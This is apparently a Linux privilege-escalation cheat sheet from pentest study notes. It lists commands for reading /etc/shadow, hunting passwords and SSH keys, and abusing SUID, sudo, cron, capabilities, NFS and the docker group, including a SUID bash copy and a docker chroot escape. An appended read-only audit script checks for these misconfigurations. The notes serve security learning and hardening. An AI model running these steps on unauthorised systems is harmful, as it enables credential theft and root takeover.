Linux Privilege Escalation
Related video: https://www.bilibili.com/video/BV1paNfzPErh/?spm_id_from=333.1387.homepage.video_card.click
Enumeration
- System Enumeration
hostname
uname -a
cat /proc/version
cat /etc/issue
lscpu
ps -aux
- User Enumeration
whoami
id
sudo -l
cat /etc/passwd
cat /etc/shadow
cat /etc/group
history
sudo su -
- Network Enumeration
ifconfig
ip a
ip route
route
arp -a
ip neigh
netstat -ano
- Password Hunting
grep --color=always -rnw '/' -ie "PASSWORD=" 2> /dev/null
locate password | more
find / -name id_rsa 2> /dev/null
Kernel-Exploit
- Dirty Cow
- PwnKit
Passwords&File-Permissions
- Weak File Permissions
- SSH Keys
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
Sudo
- VIM
- awk
- apache2
- nano
- LD_PRELOAD
SUID
- find / -perm -u=s -type f 2>/dev/null // https://gtfobins.github.io/#+suid
- find / -type f -perm -04000 -ls 2>/dev/null
Capabilities
- getcap -r / 2>/dev/null // cap_setuid+ep
Scheduled-Tasks
- cat /etc/crontab // PayloadsAllTheThings
- cp /bin/bash /tmp/bash;chmod +s /tmp/bash
- WildCards
- OverWrites
- OverView
NFS-Root-Squashing
- cat /etc/exports
Docker
- Docker Group // docker run -v /:/mnt --rm -it bash chroot /mnt sh
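
Added example, not part of the original notes: read-only audit helpers an administrator can run to flag the configurations behind the Scheduled-Tasks, NFS-Root-Squashing, Docker Group and Capabilities entries above. The function names and the script name audit.sh are chosen for this example.

```shell
#!/bin/sh
# Added example: read-only audit helpers. Function names are chosen for this
# example; each takes a file path (or stdin) so copies of a host's files work.

# Root jobs in a system crontab (5 time fields, user, command) whose program is
# missing or writable by group/other. @reboot-style and relative-path entries
# are skipped by this check.
audit_crontab() {  # $1 = crontab file
    grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$1" |
    while read -r _m _h _dom _mon _dow user cmd _rest; do
        [ "$user" = root ] || continue
        case $cmd in /*) ;; *) continue ;; esac
        if [ ! -e "$cmd" ]; then
            echo "MISSING $cmd"
        elif [ -n "$(find -H "$cmd" -prune \( -perm -020 -o -perm -002 \))" ]; then
            echo "WRITABLE $cmd"
        fi
    done
}

# Export lines in an exports file that disable root squashing.
audit_exports() {  # $1 = exports file
    grep -v '^[[:space:]]*#' "$1" | grep -E '[(,]no_root_squash[,)]'
}

# Accounts listed as members of the docker group in a group file.
docker_group_members() {  # $1 = group file
    awk -F: '$1 == "docker" && $4 != "" { print $4 }' "$1"
}

# Lines of `getcap -r /` output (read from stdin) that grant cap_setuid.
audit_caps() {
    grep 'cap_setuid'
}

# Live run against this host: sh audit.sh --live
if [ "${1:-}" = "--live" ]; then
    audit_crontab /etc/crontab
    audit_exports /etc/exports
    docker_group_members /etc/group
    getcap -r / 2>/dev/null | audit_caps || true
fi
```

Every line it prints is something to fix: tighten the script's permissions, remove no_root_squash, trim docker group membership, or drop the capability.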